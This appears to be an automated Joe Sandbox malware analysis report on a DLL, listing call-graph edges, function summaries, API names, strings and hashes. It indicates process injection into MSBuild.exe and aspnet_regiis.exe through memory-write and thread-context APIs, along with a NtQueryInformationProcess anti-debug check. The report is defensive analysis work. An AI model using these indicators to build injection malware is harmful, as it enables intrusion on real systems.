12915->12942 12918 6ce3366d 12916->12918 12919 6ce3367a 12918->12919 12920 6ce33689 12918->12920 12919->12525 12921 6ce33691 12920->12921 12922 6ce336b6 12920->12922 12921->12919 12948 6ce33734 12921->12948 12923 6ce340fb ___scrt_uninitialize_crt WideCharToMultiByte 12922->12923 12925 6ce336c6 12923->12925 12926 6ce336e3 12925->12926 12927 6ce336cd GetLastError 12925->12927 12930 6ce33734 14 API calls 12926->12930 12933 6ce336f4 12926->12933 12928 6ce32d95 __dosmaperr 14 API calls 12927->12928 12929 6ce336d9 12928->12929 12932 6ce32dcb _free 14 API calls 12929->12932 12930->12933 12931 6ce340fb ___scrt_uninitialize_crt WideCharToMultiByte 12934 6ce3370c 12931->12934 12932->12919 12933->12919 12933->12931 12934->12919 12935 6ce33713 GetLastError 12934->12935 12936 6ce32d95 __dosmaperr 14 API calls 12935->12936 12937 6ce3371f 12936->12937 12938 6ce32dcb _free 14 API calls 12937->12938 12938->12919 12940 6ce32afe __dosmaperr 14 API calls 12939->12940 12941 6ce32dbd 12940->12941 12941->12910 12945 6ce342da 12942->12945 12946 6ce343ef __dosmaperr 5 API calls 12945->12946 12947 6ce342f0 12946->12947 12947->12916 12949 6ce3373f 12948->12949 12950 6ce32dcb _free 14 API calls 12949->12950 12951 6ce33748 12950->12951 12951->12919 12955 6ce33ff7 12952->12955 12956 6ce324cf __fassign 37 API calls 12955->12956 12957 6ce3400b 12956->12957 12957->12532 12958 6ce32074 12959 6ce32086 12958->12959 12960 6ce3208c 12958->12960 12962 6ce3201c 12959->12962 12963 6ce32029 12962->12963 12964 6ce32046 12962->12964 12965 6ce32040 12963->12965 12967 6ce32ce7 _free 14 API calls 12963->12967 12964->12960 12966 6ce32ce7 _free 14 API calls 12965->12966 12966->12964 12967->12963 13155 6ce322da 13158 6ce32360 13155->13158 13159 6ce322ed 13158->13159 13160 6ce32374 13158->13160 13160->13159 13161 6ce32ce7 _free 14 API calls 13160->13161 13161->13159 12968 6ce32bf9 12970 6ce32c04 12968->12970 12971 6ce32c2d 12970->12971 12972 6ce32c29 12970->12972 12974 6ce345d0 12970->12974 12979 6ce32c51 12971->12979 12975 6ce343ef __dosmaperr 5 API calls 12974->12975 12976 6ce345ec 12975->12976 12977 6ce3460a InitializeCriticalSectionAndSpinCount 12976->12977 12978 6ce345f5 12976->12978 12977->12978 12978->12970 12980 6ce32c7d 12979->12980 12981 6ce32c5e 12979->12981 12980->12972 12982 6ce32c68 DeleteCriticalSection 12981->12982 12982->12980 12982->12982 13162 6ce2f318 13163 6ce27100 std::bad_exception::bad_exception 25 API calls 13162->13163 13164 6ce2f326 13163->13164 12983 6ce2f37e 12986 6ce2fb8f 12983->12986 12985 6ce2f393 12987 6ce2fba3 12986->12987 12988 6ce2fb9c 12986->12988 12987->12985 12989 6ce3173e ___vcrt_freefls@4 14 API calls 12988->12989 12989->12987 12990 6cdfc480 13008 6ce0ded0 12990->13008 12993 6ce0ded0 26 API calls 12994 6cdfc4d5 12993->12994 12995 6ce0ded0 26 API calls 12994->12995 12996 6cdfc52f 12995->12996 12997 6ce0ded0 26 API calls 12996->12997 12998 6cdfc545 12997->12998 12999 6ce0ded0 26 API calls 12998->12999 13007 6cdfc558 12999->13007 13000 6ce0ded0 26 API calls 13000->13007 13001 6cdfcc6d 13002 6ce2e610 _ValidateLocalCookies 5 API calls 13001->13002 13004 6cdfcc80 13002->13004 13005 6ce0e7b0 25 API calls 13005->13007 13006 6cdf1010 26 API calls 13006->13007 13007->13000 13007->13001 13007->13005 13007->13006 13019 6cdf7370 13007->13019 13012 6ce0df2b 13008->13012 13009 6ce15e30 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 13009->13012 13010 6ce16540 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 13010->13012 13011 6ce0e5d8 13023 6ce16970 13011->13023 13012->13009 13012->13010 13012->13011 13017 6ce2e610 _ValidateLocalCookies 5 API calls 13018 6cdfc4bf 13017->13018 13018->12993 13020 6cdf73cb 13019->13020 13021 6ce2e610 _ValidateLocalCookies 5 API calls 13020->13021 13022 6cdf7694 13021->13022 13022->13007 13025 6ce16992 13023->13025 13024 6ce193c0 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 13024->13025 13025->13024 13026 6ce18000 26 API calls 13025->13026 13027 6ce170b2 13025->13027 13026->13025 13028 6ce2e610 _ValidateLocalCookies 5 API calls 13027->13028 13029 6ce0e5e9 13028->13029 13030 6ce17300 13029->13030 13033 6ce17354 13030->13033 13031 6ce2e610 _ValidateLocalCookies 5 API calls 13032 6ce0e5f1 13031->13032 13032->13017 13033->13031

                                                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                                                              Function 6CE04270 Relevance: 89.3, APIs: 32, Strings: 14, Instructions: 8790nativethreadmemoryCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Virtual$MemoryThread$Write$Create$ContextWindow$AllocateCloseConsoleHandleProcessResumeShow$AllocRead
                                                                                                                                                                                                                                              • String ID: d;$d;$#K>&$)LE$@$C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe$D$I1Z$I1Z$MZx$jW}0$kernel32.dll$ntdll.dll
                                                                                                                                                                                                                                              • API String ID: 2147668725-4089158577
                                                                                                                                                                                                                                              • Opcode ID: c94654091b746611dffebff9f4227d955ad4bc2d63b432ad0c1136e1922cdcf7
                                                                                                                                                                                                                                              • Instruction ID: 94032c548869c16c82a1d1955f563656fbf862707214fb2684946fe3fed0d9d0
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c94654091b746611dffebff9f4227d955ad4bc2d63b432ad0c1136e1922cdcf7
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FAE31236B416158FCB08CE3CC9957CE77F2AB4B314F205699D416DBB94D23A8A4ACF81
                                                                                                                                                                                                                                              Function 6CDFD160 Relevance: 65.2, APIs: 23, Strings: 12, Instructions: 3958filememoryCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Handle$Close$FileModule$NameProtectVirtual$CurrentProcess$CreateInformationView
                                                                                                                                                                                                                                              • String ID: 0J<($>'+9$>'+9$@$S$jV&$jV&$nlB[$t>6N$v(R$v(R$v'{
                                                                                                                                                                                                                                              • API String ID: 395468248-1931959953
                                                                                                                                                                                                                                              • Opcode ID: 6126a30d70bf8e52fb887b6cdccde43bc0b342269f0c2ad9eee2afc75a8dcfe5
                                                                                                                                                                                                                                              • Instruction ID: 0433d2ff6ce34b4e8b3cebf524076d04935f7f16bcd7456e39b008eb86f5439d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6126a30d70bf8e52fb887b6cdccde43bc0b342269f0c2ad9eee2afc75a8dcfe5
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EA531376B452508FCB148F3CC9953CA37F2BB87354F214299D465DBBA4D73A8A8ACB40
                                                                                                                                                                                                                                              Function 6CE02F70 Relevance: 20.3, APIs: 2, Strings: 9, Instructions: 1041nativeCOMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 1634 6ce02f70-6ce02fc2 1635 6ce02fc9-6ce02fd4 1634->1635 1636 6ce02fda-6ce02fe7 1635->1636 1637 6ce03d8c-6ce03d9c 1635->1637 1640 6ce03bdb-6ce03beb 1636->1640 1641 6ce02fed-6ce02ffa 1636->1641 1638 6ce03e25 1637->1638 1638->1635 1640->1638 1643 6ce03000-6ce0300d 1641->1643 1644 6ce03e0f-6ce03e19 1641->1644 1646 6ce03013-6ce03020 1643->1646 1647 6ce03dbc-6ce03dc3 1643->1647 1644->1638 1649 6ce03bf0-6ce03bf7 1646->1649 1650 6ce03026-6ce03033 1646->1650 1647->1638 1649->1638 1652 6ce03039-6ce03046 1650->1652 1653 6ce0387c-6ce03883 1650->1653 1655 6ce03775-6ce037c7 1652->1655 1656 6ce0304c-6ce03059 1652->1656 1653->1638 1655->1638 1658 6ce03420-6ce03467 1656->1658 1659 6ce0305f-6ce0306c 1656->1659 1658->1638 1661 6ce03b81-6ce03bca 1659->1661 1662 6ce03072-6ce0307f 1659->1662 1661->1638 1664 6ce035a4-6ce03623 GetModuleHandleW call 6ce00fc0 call 6ce2f3e0 1662->1664 1665 6ce03085-6ce03092 1662->1665 1664->1638 1668 6ce03098-6ce030a5 1665->1668 1669 6ce0389a-6ce03908 1665->1669 1673 6ce03a07-6ce03a75 1668->1673 1674 6ce030ab-6ce030b8 1668->1674 1669->1638 1673->1638 1677 6ce03dc8-6ce03dcf 1674->1677 1678 6ce030be-6ce030cb 1674->1678 1677->1638 1680 6ce03da1-6ce03dab 1678->1680 1681 6ce030d1-6ce030de 1678->1681 1680->1638 1683 6ce030e4-6ce030f1 1681->1683 1684 6ce0366e-6ce036b8 1681->1684 1686 6ce030f7-6ce03104 1683->1686 1687 6ce03bcf-6ce03bd6 1683->1687 1684->1638 1689 6ce03994-6ce03a02 1686->1689 1690 6ce0310a-6ce03117 1686->1690 1687->1638 1689->1638 1692 6ce03ca4-6ce03cbe call 6ce2e610 1690->1692 1693 6ce0311d-6ce0312a 1690->1693 1696 6ce03d80-6ce03d87 1693->1696 1697 6ce03130-6ce0313d 1693->1697 1696->1638 1700 6ce03143-6ce03150 1697->1700 1701 6ce037cc-6ce037d3 1697->1701 1703 6ce03156-6ce03163 1700->1703 1704 6ce03bfc-6ce03c3d 1700->1704 1701->1638 1706 6ce03169-6ce03176 1703->1706 1707 6ce03e1e 1703->1707 1704->1638 1709 6ce03628-6ce03669 1706->1709 1710 6ce0317c-6ce03189 1706->1710 1707->1638 1709->1638 1712 6ce036c9-6ce036d8 1710->1712 1713 6ce0318f-6ce0319c 1710->1713 1712->1638 1715 6ce031a2-6ce031af 1713->1715 1716 6ce03727-6ce03770 1713->1716 1718 6ce031b5-6ce031c2 1715->1718 1719 6ce03df7-6ce03dfe 1715->1719 1716->1638 1721 6ce03387-6ce033cd 1718->1721 1722 6ce031c8-6ce031d5 1718->1722 1719->1638 1721->1638 1724 6ce03b16-6ce03b7c 1722->1724 1725 6ce031db-6ce031e8 1722->1725 1724->1638 1727 6ce03552-6ce03593 1725->1727 1728 6ce031ee-6ce031fb 1725->1728 1727->1638 1730 6ce03201-6ce0320e 1728->1730 1731 6ce034df-6ce0354d 1728->1731 1733 6ce03d32-6ce03d7b 1730->1733 1734 6ce03214-6ce03221 1730->1734 1731->1638 1733->1638 1736 6ce03c42-6ce03c93 1734->1736 1737 6ce03227-6ce03234 1734->1737 1736->1638 1739 6ce03a7a-6ce03ac3 1737->1739 1740 6ce0323a-6ce03247 1737->1740 1739->1638 1742 6ce03598-6ce0359f 1740->1742 1743 6ce0324d-6ce0325a 1740->1743 1742->1638 1745 6ce03260-6ce0326d 1743->1745 1746 6ce03ac8-6ce03b11 1743->1746 1748 6ce03273-6ce03280 1745->1748 1749 6ce03cbf-6ce03d2d 1745->1749 1746->1638 1751 6ce03286-6ce03293 1748->1751 1752 6ce03c98-6ce03c9f 1748->1752 1749->1638 1754 6ce03299-6ce032a6 1751->1754 1755 6ce0346c-6ce034da 1751->1755 1752->1638 1757 6ce03988-6ce0398f 1754->1757 1758 6ce032ac-6ce032b9 1754->1758 1755->1638 1757->1638 1760 6ce03e03-6ce03e0a 1758->1760 1761 6ce032bf-6ce032cc 1758->1761 1760->1638 1763 6ce032d2-6ce032df 1761->1763 1764 6ce036dd-6ce03722 NtQueryInformationProcess 1761->1764 1766 6ce032e5-6ce032f2 1763->1766 1767 6ce037d8-6ce03821 1763->1767 1764->1638 1769 6ce03888-6ce03895 1766->1769 1770 6ce032f8-6ce03305 1766->1770 1767->1638 1769->1638 1772 6ce03dd4-6ce03dde 1770->1772 1773 6ce0330b-6ce03318 1770->1773 1772->1638 1775 6ce03de3-6ce03df2 1773->1775 1776 6ce0331e-6ce0332b 1773->1776 1775->1638 1778 6ce03331-6ce0333e 1776->1778 1779 6ce03826-6ce03877 1776->1779 1781 6ce03344-6ce03351 1778->1781 1782 6ce0390d-6ce03983 1778->1782 1779->1638 1784 6ce033d2-6ce0341b 1781->1784 1785 6ce03357-6ce03364 1781->1785 1782->1638 1784->1638 1787 6ce0336a-6ce03377 1785->1787 1788 6ce036bd-6ce036c4 1785->1788 1790 6ce03db0-6ce03db7 1787->1790 1791 6ce0337d-6ce03382 1787->1791 1788->1638 1790->1638 1791->1638
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • NtQueryInformationProcess.NTDLL ref: 6CE0370B
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InformationProcessQuery
                                                                                                                                                                                                                                              • String ID: -&dU$0l8$LukB$NtQueryInformationProcess$j.X4$ntdll.dll$f]N$g$g
                                                                                                                                                                                                                                              • API String ID: 1778838933-2710835337
                                                                                                                                                                                                                                              • Opcode ID: 8349c1cb45273ed0dc252d2d768626e359501948a23c7914a975e3e9023a86c5
                                                                                                                                                                                                                                              • Instruction ID: 53b7844f66eccdd1584da7af214f48910405476032452d63077f10830ab5ee7f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8349c1cb45273ed0dc252d2d768626e359501948a23c7914a975e3e9023a86c5
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 97724436B456018FCF18CEBCD995BCD7BF2AB47355F205619D411EBBA4D72A880B8B80
                                                                                                                                                                                                                                              Function 6CE2E7DE Relevance: 10.6, APIs: 7, Instructions: 136COMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 1793 6ce2e7de-6ce2e7f1 call 6ce2f090 1796 6ce2e7f3-6ce2e7f5 1793->1796 1797 6ce2e7f7-6ce2e819 call 6ce2ec78 1793->1797 1799 6ce2e860-6ce2e86f 1796->1799 1801 6ce2e886-6ce2e89f call 6ce2ef12 call 6ce2f090 1797->1801 1802 6ce2e81b-6ce2e85e call 6ce2ed43 call 6ce2ebff call 6ce2f061 call 6ce2e873 call 6ce2eee4 call 6ce2e880 1797->1802 1814 6ce2e8b0-6ce2e8b7 1801->1814 1815 6ce2e8a1-6ce2e8a7 1801->1815 1802->1799 1818 6ce2e8c3-6ce2e8d7 dllmain_raw 1814->1818 1819 6ce2e8b9-6ce2e8bc 1814->1819 1815->1814 1817 6ce2e8a9-6ce2e8ab 1815->1817 1824 6ce2e989-6ce2e998 1817->1824 1821 6ce2e980-6ce2e987 1818->1821 1822 6ce2e8dd-6ce2e8ee dllmain_crt_dispatch 1818->1822 1819->1818 1820 6ce2e8be-6ce2e8c1 1819->1820 1825 6ce2e8f4-6ce2e906 call 6ce0c950 1820->1825 1821->1824 1822->1821 1822->1825 1831 6ce2e908-6ce2e90a 1825->1831 1832 6ce2e92f-6ce2e931 1825->1832 1831->1832 1834 6ce2e90c-6ce2e92a call 6ce0c950 call 6ce2e7de dllmain_raw 1831->1834 1835 6ce2e933-6ce2e936 1832->1835 1836 6ce2e938-6ce2e949 dllmain_crt_dispatch 1832->1836 1834->1832 1835->1821 1835->1836 1836->1821 1838 6ce2e94b-6ce2e97d dllmain_raw 1836->1838 1838->1821
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • __RTC_Initialize.LIBCMT ref: 6CE2E825
                                                                                                                                                                                                                                              • ___scrt_uninitialize_crt.LIBCMT ref: 6CE2E83F
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Initialize___scrt_uninitialize_crt
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2442719207-0
                                                                                                                                                                                                                                              • Opcode ID: 47d8a3ed5c2578b2fa9393e1af08dd99a6adae50dac5dfa8e26f9905a7b8502f
                                                                                                                                                                                                                                              • Instruction ID: 6e80ec22f750c0074341f040c98bca1552c9153aca2d081b46ec1cfe3971886d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 47d8a3ed5c2578b2fa9393e1af08dd99a6adae50dac5dfa8e26f9905a7b8502f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2441DF72E01E39AEEB108FB9C840B9E7A74EB4576AF30055AE85467B50C73C49059BD0
                                                                                                                                                                                                                                              Function 6CE2E88E Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 1843 6ce2e88e-6ce2e89f call 6ce2f090 1846 6ce2e8b0-6ce2e8b7 1843->1846 1847 6ce2e8a1-6ce2e8a7 1843->1847 1849 6ce2e8c3-6ce2e8d7 dllmain_raw 1846->1849 1850 6ce2e8b9-6ce2e8bc 1846->1850 1847->1846 1848 6ce2e8a9-6ce2e8ab 1847->1848 1854 6ce2e989-6ce2e998 1848->1854 1852 6ce2e980-6ce2e987 1849->1852 1853 6ce2e8dd-6ce2e8ee dllmain_crt_dispatch 1849->1853 1850->1849 1851 6ce2e8be-6ce2e8c1 1850->1851 1855 6ce2e8f4-6ce2e906 call 6ce0c950 1851->1855 1852->1854 1853->1852 1853->1855 1858 6ce2e908-6ce2e90a 1855->1858 1859 6ce2e92f-6ce2e931 1855->1859 1858->1859 1860 6ce2e90c-6ce2e92a call 6ce0c950 call 6ce2e7de dllmain_raw 1858->1860 1861 6ce2e933-6ce2e936 1859->1861 1862 6ce2e938-6ce2e949 dllmain_crt_dispatch 1859->1862 1860->1859 1861->1852 1861->1862 1862->1852 1864 6ce2e94b-6ce2e97d dllmain_raw 1862->1864 1864->1852
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: dllmain_raw$dllmain_crt_dispatch
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3136044242-0
                                                                                                                                                                                                                                              • Opcode ID: 7f58d659d36c7858edb84b74846c2f5ef8e5884e5f0357126d7aee17d8522da2
                                                                                                                                                                                                                                              • Instruction ID: 896506bce4365e0c36c10ba39cb66f21c6a606b05ad580711363cd7b9a419e8b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7f58d659d36c7858edb84b74846c2f5ef8e5884e5f0357126d7aee17d8522da2
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6F21E471E01E39AEDB118E75C840FAF3A78EB8579DB31165AF81457B10C3388D019BD0
                                                                                                                                                                                                                                              Function 6CE2E6D7 Relevance: 3.1, APIs: 2, Instructions: 76COMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 1869 6ce2e6d7-6ce2e6e5 call 6ce2f090 call 6ce2ed73 1873 6ce2e6ea-6ce2e6ed 1869->1873 1874 6ce2e6f3-6ce2e70b call 6ce2ec78 1873->1874 1875 6ce2e7c4 1873->1875 1879 6ce2e711-6ce2e722 call 6ce2ecd5 1874->1879 1880 6ce2e7d6-6ce2e7dd call 6ce2ef12 1874->1880 1877 6ce2e7c6-6ce2e7d5 1875->1877 1885 6ce2e771-6ce2e77f call 6ce2e7ba 1879->1885 1886 6ce2e724-6ce2e746 call 6ce2f035 call 6ce2ebf3 call 6ce2ec17 call 6ce3179e 1879->1886 1885->1875 1891 6ce2e781-6ce2e78b call 6ce2ef0c 1885->1891 1886->1885 1905 6ce2e748-6ce2e74f call 6ce2ecaa 1886->1905 1897 6ce2e7ac-6ce2e7b5 1891->1897 1898 6ce2e78d-6ce2e796 call 6ce2ee33 1891->1898 1897->1877 1898->1897 1904 6ce2e798-6ce2e7aa 1898->1904 1904->1897 1905->1885 1909 6ce2e751-6ce2e76e call 6ce31759 1905->1909 1909->1885
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • __RTC_Initialize.LIBCMT ref: 6CE2E724
                                                                                                                                                                                                                                                • Part of subcall function 6CE2EBF3: InitializeSListHead.KERNEL32(6CE8DC50,6CE2E72E,6CE3F880,00000010,6CE2E6BF,?,?,?,6CE2E8E7,?,00000001,?,?,00000001,?,6CE3F8C8), ref: 6CE2EBF8
                                                                                                                                                                                                                                              • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6CE2E78E
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3231365870-0
                                                                                                                                                                                                                                              • Opcode ID: d24459848af649de417b6f56c094e77db1492ee4744ba3b656a301ef0e6f78b5
                                                                                                                                                                                                                                              • Instruction ID: 52538b7e7801b4e81247636a506a491595e5e31ee6089571e34a67c5fd68fd5e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d24459848af649de417b6f56c094e77db1492ee4744ba3b656a301ef0e6f78b5
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3321B832689B369EEB006BF498057E837719B0222EF30142DD49467BC1DB6E1188C6E1

                                                                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                                                                              Function 6CE27100 Relevance: 16.4, APIs: 3, Strings: 6, Instructions: 630COMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
